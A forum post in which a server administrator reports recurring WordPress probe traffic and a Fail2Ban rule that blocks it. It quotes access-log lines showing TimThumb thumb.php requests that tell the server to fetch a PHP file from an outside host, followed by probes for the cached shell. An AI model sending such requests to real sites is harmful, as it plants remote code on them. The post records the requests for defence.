Curious about WordPress probes
I don't have WordPress on my server and have never used it on any of the domains that I have hosted there. so any attempt is completely bogus.
While there are lots of IP only based attempts, I don't use any virtual websites that work with just and IP, they have to be accessed by host name… I have noticed a curious trend which is that most of the attempts are towards one of the virtual hosts and seldom to the others.
Are others seeing this as well?
I use Fail2Ban and created a rule to look for these attempts and block the IP of the site after they are caught, typically after 2 or more attempts and that works quite well.. but it is not uncommon for there to be upwards of 20-30 attempts from different sources a day all for the exact same stuff on the same domain.
The domain is not all that special and again has never had WordPress on it, so it seems peculiar why this is a trend. The only other thing I can think of is that they are starting there first, getting trapped and never have the chance to try other domains sharing the same IP.??
Example Entries:
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info/pagecount/wp-content/themes/folioway/core/thumb.php?src=http%3a%2f%2fwordpress.com.supplymi.com/tmp.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info/pagecount/wp-content/themes/folioway/core/temp/52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info//wp-content/uploads/thumb-temp/52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:58 -0700] "GET //wp-content/themes/clockstone/images/cache/external_52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
SITE BLOCKED
2012-10-11 08:55:58,760 fail2ban.actions: WARNING [apache-hacks] Ban 209.217.252.178